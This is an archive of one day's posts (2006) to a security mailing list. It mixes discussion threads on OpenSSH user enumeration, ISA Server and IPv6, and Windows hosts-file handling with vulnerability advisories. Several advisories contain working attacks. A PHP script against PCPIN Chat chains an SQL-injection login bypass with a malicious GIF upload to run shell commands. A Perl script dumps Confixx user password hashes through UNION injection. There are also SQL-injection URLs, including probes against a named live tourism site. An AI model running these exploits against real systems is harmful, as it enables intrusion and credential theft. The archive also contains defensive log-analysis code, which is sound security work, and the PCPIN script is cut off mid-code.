ASPSitem <= 1.83 Remote SQL Injection Vulnerability

2006-04-19 Thread Mustafa Can Bjorn IPEKCI

--Security Report--
Advisory: ASPSitem <= 1.83 Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 19/04/06 19:33 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [EMAIL PROTECTED]
Web: http://www.nukedx.com
}
---
Vendor: ASPSitem (http://www.aspsitem.com)
Version: 1.83 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to id 
parameter in Haberler.asp
Level: Critical
Solution: Upgrade your ASPSitem version to 2.0
---
How&Example: 
GET -> http://[victim]/[ASPSitemDir]/Haberler.asp?haber=devam&id=[SQL]
EXAMPLE -> 

http://[victim]/[ASPSitemDir]/Haberler.asp?haber=devam&id=-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%201
with this example remote attacker can leak userid 1's login information from 
database.
---
Timeline:
* 19/04/2006: Vulnerability found.
* 19/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=23
---
Dorks: "Teşekkür ASPSitem"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=23


Strengthen OpenSSH security?

2006-04-19 Thread Brett Glass
I'm sure that most folks with hosts that expose an OpenSSH daemon 
to the Internet have been getting the usual probes and password 
guessing attempts and have been taking appropriate actions (e.g. 
setting AllowUsers and using strong passwords) to protect 
yourselves. But today, on one of my servers, I noticed a new trend: 
the attackers are getting smarter. Apparently, they can tell the 
difference between a user ID which is not named in an AllowUsers 
directive -- or which does not exist at all -- from one for which 
they just haven't guessed the correct password. I've now watched as 
some attackers (but not all... yet) tried various user IDs, noted 
which ones existed and were in AllowUsers, and focused password 
guessing attacks on just those user IDs.


It seems to me that sshd should not tip its hand by returning 
different responses when a user ID can be used for logins than when 
it can't -- allowing an attacker to focus password guessing attacks 
on user IDs with which it would have a chance of gaining access. 
For those folks out there who are more familiar with OpenSSH than I 
am: How hard would it be to make the responses indistinguishable?


--Brett Glass
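The behaviour Brett describes leaves a distinctive trace in sshd's own log: a burst of distinct names that sshd reports as "invalid user", followed by repeated failed passwords against the few names it did not reject. The C program below is an added example, not part of this thread, that scores each source address on exactly that sequence and flags the ones that enumerated before focusing. It assumes OpenSSH's usual "Invalid user ..." and "Failed password for ..." wording, runs over a constructed log excerpt embedded in the code, and the function names, table sizes and threshold are the example's own.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SRC 32      /* table sizes: enough for a demonstration over a short excerpt */
#define MAX_NAMES 64
#define NAME_LEN 64

struct source {
    char addr[NAME_LEN];
    char probed[MAX_NAMES][NAME_LEN]; /* distinct user names tried from this address */
    int nprobed, ninvalid, focused;   /* names tried; of those, reported invalid; guesses at real accounts */
};
static struct source table[MAX_SRC];
static int ntable;

/* Find the record for a source address, creating it on first sight. */
static struct source *lookup(const char *addr)
{
    for (int i = 0; i < ntable; i++) if (strcmp(table[i].addr, addr) == 0) return &table[i];
    if (ntable == MAX_SRC) return NULL;
    memset(&table[ntable], 0, sizeof table[ntable]);
    snprintf(table[ntable].addr, NAME_LEN, "%s", addr);
    return &table[ntable++];
}

/* Copy [p, end) into dst as a NUL-terminated string, truncating to cap-1 bytes. */
static void copy_token(char *dst, size_t cap, const char *p, const char *end)
{
    size_t n = (size_t)(end - p) < cap ? (size_t)(end - p) : cap - 1;
    memcpy(dst, p, n); dst[n] = '\0';
}

/* Parse one sshd auth-log line into (user, addr, is_invalid); returns 1 if recognised.
   Wording assumed is OpenSSH's usual: "Invalid user NAME from ADDR", "Failed password for
   invalid user NAME from ADDR port N ssh2", and for a real account "Failed password for NAME from ADDR ...". */
int parse_auth_line(const char *line, char *user, size_t ucap, char *addr, size_t acap, int *is_invalid)
{
    static const char inv[] = "Invalid user ", fail_inv[] = "Failed password for invalid user ",
                      fail[] = "Failed password for ";
    const char *p;
    if ((p = strstr(line, inv)))           { p += sizeof inv - 1;      *is_invalid = 1; }
    else if ((p = strstr(line, fail_inv))) { p += sizeof fail_inv - 1; *is_invalid = 1; }
    else if ((p = strstr(line, fail)))     { p += sizeof fail - 1;     *is_invalid = 0; }
    else return 0;
    const char *from = strstr(p, " from ");
    if (from == NULL || from == p) return 0;
    copy_token(user, ucap, p, from);
    const char *a = from + 6, *aend = strchr(a, ' ');  /* address runs to the next space or end of line */
    if (aend == NULL) aend = a + strlen(a);
    if (aend == a) return 0;
    copy_token(addr, acap, a, aend);
    return 1;
}

/* Update a source's counters with one parsed event; each name is counted once. */
static void record(struct source *s, const char *user, int is_invalid)
{
    int seen = 0;
    for (int i = 0; i < s->nprobed && !seen; i++) seen = (strcmp(s->probed[i], user) == 0);
    if (!seen && s->nprobed < MAX_NAMES) {
        snprintf(s->probed[s->nprobed++], NAME_LEN, "%s", user);
        if (is_invalid) s->ninvalid++;
    }
    if (!is_invalid) s->focused++;
}

/* Run the heuristic over a set of lines: report each source that tried at least min_invalid
   distinct non-existent names AND then aimed password guesses at an account that exists.
   Returns the number of such sources; the table is reset on every call. */
int find_enumerators(const char *const *lines, int nlines, int min_invalid)
{
    char user[NAME_LEN], addr[NAME_LEN];
    int is_invalid, hits = 0;
    ntable = 0;
    for (int i = 0; i < nlines; i++) {
        if (!parse_auth_line(lines[i], user, sizeof user, addr, sizeof addr, &is_invalid)) continue;
        struct source *s = lookup(addr);
        if (s) record(s, user, is_invalid);
    }
    for (int i = 0; i < ntable; i++)
        if (table[i].ninvalid >= min_invalid && table[i].focused > 0) {
            printf("%s: %d invalid names probed, then %d guesses at real accounts\n",
                   table[i].addr, table[i].ninvalid, table[i].focused);
            hits++;
        }
    return hits;
}

/* Read back the i-th source record after a run (NULL when out of range). */
const struct source *source_at(int i) { return i >= 0 && i < ntable ? &table[i] : NULL; }

/* Constructed sample excerpt: 203.0.113.7 probes three non-existent names, then hammers
   "brett", which exists; 198.51.100.4 makes a single ordinary failed login. */
static const char *const SAMPLE[] = {
    "Apr 19 10:01:02 host sshd[4101]: Invalid user oracle from 203.0.113.7",
    "Apr 19 10:01:02 host sshd[4101]: Failed password for invalid user oracle from 203.0.113.7 port 51212 ssh2",
    "Apr 19 10:01:05 host sshd[4103]: Invalid user test from 203.0.113.7",
    "Apr 19 10:01:09 host sshd[4105]: Invalid user admin from 203.0.113.7",
    "Apr 19 10:01:12 host sshd[4107]: Failed password for brett from 203.0.113.7 port 51215 ssh2",
    "Apr 19 10:01:15 host sshd[4109]: Failed password for brett from 203.0.113.7 port 51216 ssh2",
    "Apr 19 10:02:01 host sshd[4111]: Failed password for brett from 198.51.100.4 port 40000 ssh2",
};
enum { SAMPLE_COUNT = sizeof SAMPLE / sizeof SAMPLE[0] };
```

find_enumerators(SAMPLE, SAMPLE_COUNT, 3) reports 203.0.113.7 and stays quiet about 198.51.100.4. The same per-source counters are what a log watcher would feed into a temporary block rule; the threshold is the tuning knob, since one user mistyping their own login also produces an "invalid user" line, just not several distinct ones followed by a run of guesses against a real account.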



[USN-271-1] Firefox vulnerabilities

2006-04-19 Thread Martin Pitt
===
Ubuntu Security Notice USN-271-1 April 19, 2006
mozilla-firefox, firefox vulnerabilities
CVE-2005-4134, CVE-2006-0292, CVE-2006-0296, CVE-2006-0749,
CVE-2006-1727, CVE-2006-1728, CVE-2006-1729, CVE-2006-1730,
CVE-2006-1731, CVE-2006-1732, CVE-2006-1733, CVE-2006-1734,
CVE-2006-1735, CVE-2006-1736, CVE-2006-1737, CVE-2006-1738,
CVE-2006-1739, CVE-2006-1740, CVE-2006-1741, CVE-2006-1742,
CVE-2006-1790
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

firefox
mozilla-firefox

The problem can be corrected by upgrading the affected package to
version 1.0.8-0ubuntu4.10 (for Ubuntu 4.10), 1.0.8-0ubuntu5.04 (for
Ubuntu 5.04), or 1.0.8-0ubuntu5.10 (for Ubuntu 5.10).  After a
standard system upgrade you need to restart Firefox to effect the
necessary changes.

Details follow:

Web pages with extremely long titles caused subsequent launches of
Firefox browser to hang for up to a few minutes, or caused Firefox to
crash on computers with insufficient memory. (CVE-2005-4134)

Igor Bukanov discovered that the JavaScript engine did not properly
declare some temporary variables. Under some rare circumstances, a
malicious website could exploit this to execute arbitrary code with
the privileges of the user. (CVE-2006-0292, CVE-2006-1742)

The function XULDocument.persist() did not sufficiently validate the
names of attributes. An attacker could exploit this to inject
arbitrary XML code into the file 'localstore.rdf', which is read and
evaluated at startup. This could include JavaScript commands that
would be run with the user's privileges. (CVE-2006-0296)

Due to a flaw in the HTML tag parser a specific sequence of HTML tags
caused memory corruption. A malicious web site could exploit this to
crash the browser or even execute arbitrary code with the user's
privileges. (CVE-2006-0749)

Georgi Guninski discovered that embedded XBL scripts of web sites
could escalate their (normally reduced) privileges to get full
privileges of the user if that page is viewed with "Print Preview".
(CVE-2006-1727)

The crypto.generateCRMFRequest() function had a flaw which could be
exploited to run arbitrary code with the user's privileges.
(CVE-2006-1728)

Claus Jørgensen and Jesse Ruderman discovered that a text input box
could be pre-filled with a filename and then turned into a file-upload
control with the contents intact. A malicious web site could exploit
this to read any local file the user has read privileges for.
(CVE-2006-1729)

An integer overflow was detected in the handling of the CSS property
"letter-spacing". A malicious web site could exploit this to run
arbitrary code with the user's privileges. (CVE-2006-1730)

The methods valueOf.call() and .valueOf.apply() returned an object
whose privileges were not properly confined to those of the caller,
which made them vulnerable to cross-site scripting attacks. A
malicious web site could exploit this to modify the contents or steal
confidential data (such as passwords) from other opened web pages.
(CVE-2006-1731) The window.controllers array variable (CVE-2006-1732)
and event handlers (CVE-2006-1741) were vulnerable to a similar attack. 

The privileged built-in XBL bindings were not fully protected from web
content and could be accessed by calling valueOf.call() and
valueOf.apply() on a method of that binding. A malicious web site
could exploit this to run arbitrary JavaScript code with the user's
privileges. (CVE-2006-1733)

It was possible to use the Object.watch() method to access an internal
function object (the "clone parent"). A malicious web site could
exploit this to execute arbitrary JavaScript code with the user's
privileges. (CVE-2006-1734)

By calling the XBL.method.eval() method in a special way it was
possible to create JavaScript functions that would get compiled with
the wrong privileges. A malicious web site could exploit this to
execute arbitrary JavaScript code with the user's privileges.
(CVE-2006-1735)

Michael Krax discovered that by layering a transparent image link to
an executable on top of a visible (and presumably desirable) image a
malicious site could fool the user to right-click and choose "Save
image as..." from the context menu, which would download the
executable instead of the image. (CVE-2006-1736)

Several crashes have been fixed which could be triggered by web sites
and involve memory corruption. These could potentially be exploited to
execute arbitrary code with the user's privileges. (CVE-2006-1737,
CVE-2006-1738, CVE-2006-1739, CVE-2006-1790)

If the user has turned on the "Entering secure site" modal warning
dialog, it was possible to spoof the browser's secure-site indicators
(the lock icon and the gold URL field background) by first loading the
target secure site in a pop-up window, t

PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn

2006-04-19 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";
echo "-> works with magic_quotes_gpc = Off\r\n";
echo "dork: \"powered by PCPIN.com\"\r\n\r\n";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:  target server (ip/hostname)\r\n";
echo "path:  path to pcpin\r\n";
echo "cmd:   a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /pcpin/ cat ./config/db.inc.php\r\n";
echo "php ".$argv[0]." localhost /pcpin/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}

/*
   software site: http://www.pcpin.com/
   description: a chat software written in php that uses mysql for data storage

   vulnerabilites:
   i) sql injection:
   you can login as admin typing:
   username: ") or isnull(1/0)/*
   password: [whatever]

   query becomes:
   SELECT * FROM pcpin_user WHERE (cookie = "#EMPTY#" AND cookie <> "") OR
   (login = "") or isnull(1/0)/* AND password = "[somehash]") AND activated = 
"1"
   LIMIT 1

   ii) arbitrary local inclusion:
   now you can upload smilies with php code inside, we have a local inclusion
   bug in "language" argument when you select a language so, you can include
   a gif file and launch commands...

   both works with magic_quotes_gpc=Off
  */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
  echo 'No response from '.$host.':'.$port; die;
}
  }
  else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
  echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
  echo 'No response from proxy...';die;
}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
$html='';
while (!feof($ock)) {
  $html.=fgets($ock);
}
  }
  else {
$html='';
while ((!feof($ock)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  $html.=fread($ock,1);
}
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 10);
}

$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}


#step 1 -> sql injection, login as admin
echo "[1] login...\r\n";
$sql="\") or isnull(1/0)/*";
$sql=urlencode($sql);
$data ="lostpassword=";
$data.="&include=2";
$data.="&language=english";
$data.="&submitted=1";
$data.="&login=".$sql;
$data.="&password=suntzu";
$packet ="POST ".$p."main.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
$cookie=$temp2[0];
if ($cookie =='') {die("Unable to retrieve session cookie...");}
echo "Cookie -> ".$cookie."\r\n";
$temp=explode("name=\"session_id\" value=\"",$html);
$temp2=explode("\"",$temp[1]);
$sid=$temp2[0];
if ($sid =='') {die("Unable to retrieve session id...");}
echo "session id -> ".$sid."\r\n";

srand(make_seed());
$v = rand(1,9);

#step 2 -> Upload a malicious gif file...
echo "[2] uploading the gif file...\r\n";
$data='-7d613b1d0448
Content-Disposition: form-data; name="smiliefile"; filename="suntzu.gif"
Content-Type: image/gif


-7d613b1d0448
Content-Disposition: form-data; name="session_id";

'.$s

[eVuln] N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities

2006-04-19 Thread alex
New eVuln Advisory:
N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities
http://evuln.com/vulns/121/summary.html

Summary
eVuln ID: EV0121
CVE: CVE-2006-1657 CVE-2006-1658
Vendor: Chucky A. Ivey
Software: N.T.
Software's Web Site: http://www.v-gfx.net/
Versions: 1.1.0
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
PoC/Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

-Description---
1. Cross-Site Scripting

Vulnerable Script: index.php

Parameter username is not properly sanitized. This can be used to post 
arbitrary HTML or web script code. This code will be executed when the 
administrator visits the "Login Log" page.

Administrator's session is threatened.


2. PHP Code Insertion

The administrator has the ability to edit variables in the ticker.db.php file. 
The script doesn't do any sanitization of entered values. This can be used to 
insert arbitrary PHP code.

System access is possible.


--PoC/Exploit--
Available at: http://evuln.com/vulns/121/exploit.html

--Solution-
No Patch available.

--Credit---
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)


Regards,
Aliaksandr Hartsuyeu
http://evuln.com - Penetration Testing Services
.


SQL Injection in incredibleindia.org

2006-04-19 Thread susam_pal
Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp

Found By: Susam Pal

Found On: 29th March, 2006, Wednesday

Vulnerability Type: SQL Injection

Action Taken: Reported to [EMAIL PROTECTED]

Description:

www.incredibleindia.org is a tourism website. The site is prone to SQL 
injection which can be exploited to reveal the table names, some column 
names as well as their data types. Exploiting the vulnerability requires 
some reverse engineering. The ASP ODBC error messages can be displayed by 
passing bad values for the parameters in the URL.


Example URL 1: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828'

Error Found: Unclosed quotation mark before the character string ' and 
mncpage.mnccategoryid = mnccategory.mnccategoryid'. 

Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 
'mnccategory'. Both of them have a column called 'mnccategoryid'.


Example URL 2: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 1--
Example URL 3: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 2--
Example URL 4: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 3--

Error Found: None


Example URL 5: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 
order by 4--

Error Found: The ORDER BY position number 4 is out of range of the number of 
items in the select list.

Conclusion: The table being used by the query selects 3 columns and one of them 
is an integer.


Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select 'varchar1', 'varchar2', 'varchar3' from mncpage--

Error Found: Syntax error converting the varchar value 'varchar1' to a column 
of data type int.

Conclusion: The 1st column in the select query is an integer.


Error URL 7: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select mnccategoryid, 'varchar2', 'varchar3' from mncpage--

Error Found: None

Conclusion: The column 'mnccategory' is of integer type.


Re: Re[2]: Bypassing ISA Server 2004 with IPv6

2006-04-19 Thread Christine Kronberg

On Sat, 15 Apr 2006, Thor (Hammer of God) wrote:

> ISA Server is an application that is installed on top of the base OS. Are
> you suggesting that the application should actually prevent the local
> administrator of the host machine from installing and configuring what
> protocols are bound to what adapters?

  No, I'm suggesting that the application should enable the local
  administrator to configure that application. Configuring a firewall
  is a bit more than setting a domain name. It must contain some
  (preferably reasonable) filtering mechanisms.
  From what is said so far this seems not to be possible. If that is
  true, ISA is broken by design. We are talking about a firewall. A
  firewall that cannot filter is not a firewall. Agreed?

> To me, *that* is the borderline.  There is no such thing as "for what ever
> reason ipv6 is enabled on ISA" when it comes to administering an enterprise
> firewall product.  If an administrator installs and configures ipv6 on the OS of
> the firewall, and then binds ipv6 to a protected network segment, then they
> absolutely, positively, without-a-doubt get exactly what they deserve.

  Do you think the same applies to ipv4? I said "for what ever reason ipv6
  is enabled on ISA" because I am definitely not in the position to guess
  all possible reasons for activating ipv6.

> Anyone who does that without understanding what they are doing is simply
> taking jobs away from competent, knowledgeable administrators.

  You are speaking out of my deepest heart. Anyhow, you are aware that
  it is not always the incompetent admin; sometimes it is the incompetent
  superior, and not every admin has the nerve and the backing to say no
  to idiotic orders by management.

> The mindset of "protecting the ignorant administrator from themselves" in
> this business has got to end.  Positioning this as if there is some flaw in

  Definitely.

> ISA because the application does not prohibit a local administrator from
> binding unsupported protocols to interfaces is simply ludicrous. In fact, it

  I still fail to see why an unsupported protocol goes through anyway.
  The reason for implementing a firewall is to separate networks with
  different trust levels. Not to connect them wide open. For this any
  router will do.

> is the opposite that is true:  If I as an administrator of a machine want to
> bind a protocol to an adapter for some reason (as in a separate, private
> segment for use in a particular environment) then I should, indeed MUST, be
> able to do it.  And I will be responsible for the implications of doing so.

  Sure. But even in a protected environment you may want some additional
  restrictions.

> There was an earlier thread today where a simple list of hostnames being
> filtered from the Win32 HOSTS file was positioned as "deliberate sabotage"
> of our machines by Microsoft; a case of "It's my computer- keep your hands
> off."  Yet here, the integrity of a product is being challenged because the
> application does not prevent an administrator from installing and binding
> protocols at the OS-level in cases where the application is not designed to
> filter those protocols?  That is a double-standard at its best.

  Again: If that application is a firewall it's a must to be able to
  filter. Anything else is not logical.
  If the application is some funny network gaming tool, then I heartily
  agree.

  Cheers,

  Christine Kronberg.




Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread Jamie Riden
On 14/04/06, Brandon S. Allbery KF8NH <[EMAIL PROTECTED]> wrote:
>
> On Apr 13, 2006, at 1:29 , Dave Korn wrote:
>
> >   Hey, guess what I just found out:  Microsoft have deliberately
> > sabotaged
> > their DNS client's hosts table lookup functionality.
>
> I thought this was part of avoiding malware attempts to block Windows
> Update.

In that case, they should allow us to add symantec et al - it's not
much use having Windows Update working while the machine is happily
rootkitted. Grepping hosts files across campus for 127.0.0.1 ...
liveupdate.symantec.com  - or your local equivalent - can prove
interesting.

If it was a feature, I'd expect there to be ways to add to the list of
pass-through domains, or ways to disable it.

cheers,
 Jamie
--
Jamie Riden / [EMAIL PROTECTED] / [EMAIL PROTECTED]
"Microsoft: Bringing the world to your desktop - and your desktop to
 the world." -- Peter Gutmann


Re: Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread somerandomaddress99
FYI: go.microsoft.com is used to point to security bulletins.

In fact, all the domains listed with the exception of MSN.com are used in the 
Windows and Office patching process.


[eVuln] MD News Authentication Bypass and SQL Injection Vulnerabilities

2006-04-19 Thread alex
New eVuln Advisory:
MD News Authentication Bypass and SQL Injection Vulnerabilities
http://evuln.com/vulns/120/summary.html

Summary
eVuln ID: EV0120
Software: MD News
Software's Web Site: http://www.matthewdingley.co.uk/
Versions: 1
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
PoC/Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

-Description---
1. SQL Injection.

Vulnerable script: admin.php

Parameter id is not properly sanitized before being used in SQL query. This can 
be used to make any SQL query by injecting arbitrary SQL code.


2. Authentication Bypass.

The "Administration Area" script has no authentication at all. Any user can get 
access to the administrator's area. (You just need to know the script name.)


--PoC/Exploit--
Available at: http://evuln.com/vulns/120/exploit.html

--Solution-
No Patch available.

--Credit---
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)


Regards,
Aliaksandr Hartsuyeu
http://evuln.com - Penetration Testing Services
.


Re[3]: Bypassing ISA Server 2004 with IPv6

2006-04-19 Thread Christine Kronberg


  Dear 3APA3A,

> Microsoft  ISA  Server  can't  filter  events  from Microsoft Mouse, but

  Apples and peas?

> Microsoft Mouse can be bound to computer. It's security risk, but I know
> how to secure mouse without ISA and I accept this risk.

  Nice, that you do. If I manage by any means to see remotely
  that you have attached a mouse to your ISA and to (ab)use it,
  I'm much better than I thought - and you have much bigger problems
  than you thought.
  The nice thing about icmp is that I do not require much knowledge
  to get information remotely. The same is true with ipv6. Unless something
  in between stops me. Which brings us back to the topic: a firewall
  allowing too much.

> IPv6  can  not  be  filtered  by  ISA,  but  it still can be filtered by
> different  tools,  or  by  its own means, as IPv6 supports network-level
> security.  Unlike IPv4, IPv6 supports authentication, integrity checking
> and  encryption  natively.  See ipsec6.exe and descriptions for Security
> Association Database and Security Policy Database.


  So you state that it is perfectly well for a firewall to allow
  any traffic through. Per default? And that this firewall does not
  need to have the interface to configure what traffic is allowed?
  I disagree.
  If a firewall supports a protocol, that same firewall should also
  provide the proper means and interface to configure it. And not blow
  holes in networks.

  Cheers,

  Christine Kronberg.




EasyGallery Cross-Site Scripting

2006-04-19 Thread botan
Website : www.wingnut.net.ms
Author : Botan
Credits : B3g0k,Nistiman,flot,Netqurd
Original Advisory : 

http://advisory.patriotichackers.com/index.php?itemid=5

Description : "EasyGallery is a simple web-photogallery with a maximum of 
user-friendlyness. All you have to do is to upload your photos and the 
EasyGallery files onto your webspace"

XSS code :

http://www.site.com/[path]/EasyGallery.php?ordner=XSS 


Confixx SQL Injection exploit (confixx_exploit.pl)

2006-04-19 Thread defa

Well - the patch is out - here is the exploit.

Hey - German hosters - if you call yourself "serverkompetenz.de" -  
why don't you fix your servers?


sincerely
defa

BOF
#!/usr/bin/perl

 


############################################################################
# exploit for confixx professional <= 3.1.2                                #
#                                                                          #
# the vulnerability was discovered by: LoK Crew                            #
# references: http://www.securityfocus.com/bid/17476                       #
#                                                                          #
# exploit can be used for any purpose but on own risk                      #
#                                                                          #
# (c) by defa - sorry for the crappy code                                  #
#                                                                          #
# url is just the host - directory is $url/user/index.php by default       #
# the exploit just fetches the longpw hashes of all users                  #
#                                                                          #
# parts of the code are stolen from RuSH exploits - thanks a lot folks     #
############################################################################
 



use IO::Socket;

if (@ARGV < 1)
{
print q(
exploit by defa (2006)
=
confixx_exploit.pl [URL]

params:
[URL] - server url

example: confixx_exploit.pl 127.0.0.1
);
exit;
}

$serv  = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;

for ($i=0;$i<=100;$i++)
{
$hit = 0;
$url = "http://";
$url .= $serv;
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B11,':%22','HIT:%20',";
$url .= "kunde,'%20:%20',longpw,'%20:%20','%22;')%20AS%20'sdata'%20FROM%20";

$url .= "kunden%20LIMIT%20";
$url .= "$i,1/*";

$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "80") || die "[-] CONNECT FAILED\r\n";


print  $socket "GET $url HTTP/1.1\n";
print  $socket "Host: $serv\n";
print  $socket 'User-Agent: confixx_exploit'."\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /HIT:/)
{
@result = split(/: /,$answer);

print "$result[1]: $result[2]\n";
$hit = 1;
}

}
if ($hit == 0) {die("that's it");}
}

EOF
--
don't eat yellow snow





Re: Re[2]: Bypassing ISA Server 2004 with IPv6

2006-04-19 Thread Thor (Hammer of God)
ISA Server is an application that is installed on top of the base OS. Are
you suggesting that the application should actually prevent the local
administrator of the host machine from installing and configuring what
protocols are bound to what adapters?

To me, *that* is the borderline.  There is no such thing as "for what ever
reason ipv6 is enabled on ISA" when it comes to administering an enterprise
firewall product.  If an administrator installs and configures ipv6 on the OS of
the firewall, and then binds ipv6 to a protected network segment, then they
absolutely, positively, without-a-doubt get exactly what they deserve.
Anyone who does that without understanding what they are doing is simply
taking jobs away from competent, knowledgeable administrators.

The mindset of "protecting the ignorant administrator from themselves" in
this business has got to end.  Positioning this as if there is some flaw in
ISA because the application does not prohibit a local administrator from
binding unsupported protocols to interfaces is simply ludicrous. In fact, it
is the opposite that is true:  If I as an administrator of a machine want to
bind a protocol to an adapter for some reason (as in a separate, private
segment for use in a particular environment) then I should, indeed MUST, be
able to do it.  And I will be responsible for the implications of doing so.

There was an earlier thread today where a simple list of hostnames being
filtered from the Win32 HOSTS file was positioned as "deliberate sabotage"
of our machines by Microsoft; a case of "It's my computer- keep your hands
off."  Yet here, the integrity of a product is being challenged because the
application does not prevent an administrator from installing and binding
protocols at the OS-level in cases where the application is not designed to
filter those protocols?  That is a double-standard at its best.

t


On 4/10/06 12:34 PM, "Christine Kronberg" <[EMAIL PROTECTED]> spoketh to all:

>Thanks for clearing that. But: If ISA is not able to filter IPv6 so
>why can it be bound to an interface anyway? Just to route things
>through? Blindly through a firewall?
>Another posting talks about limited filtering capabilities. Roman
>wrote, icmp went through. So where is the borderline? It still seems
>to me that in the moment for what ever reason ipv6 is enabled on ISA
>the network it should secure is exposed.
> 
>Cheers,
> 
>Christine Kronberg.




Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread Geo.
> I agree that there should have been better documentation of this, but I
> think the noted objections are a bit hyperbolic.

While I don't disagree with what you said, I think there are some things you
didn't consider.

First, why is anything besides what is required for windows update being
bypassed? Why MSN.COM? Why NOT Symantec.com? I mean this looks more like a
way to keep passport functional than as a way to foil trojans.

Second, why is it that it's darn near impossible to screw with media player
or Messenger (both are protected by Windows file protection) yet hosts file
changes don't even popup a dialog box to ask the user if the change is ok? I
mean this is a really sneaky way of "fixing" things. Also before you say WFP
or a popup could be disabled by a trojan, so could this fix.

Third, this appears to me to be just more half witted fixes imo. The problem
is a trojan modifying hosts then fix the problem instead of ignoring hosts.
Provide a locking mechanism for hosts, remove the trojan, there are a
hundred ways to fix this that are far more proper ways to do things than
this.

Geo.



Re: gcc 4.1 bug miscompiles pointer range checks, may place you at risk

2006-04-19 Thread Nate Eldredge

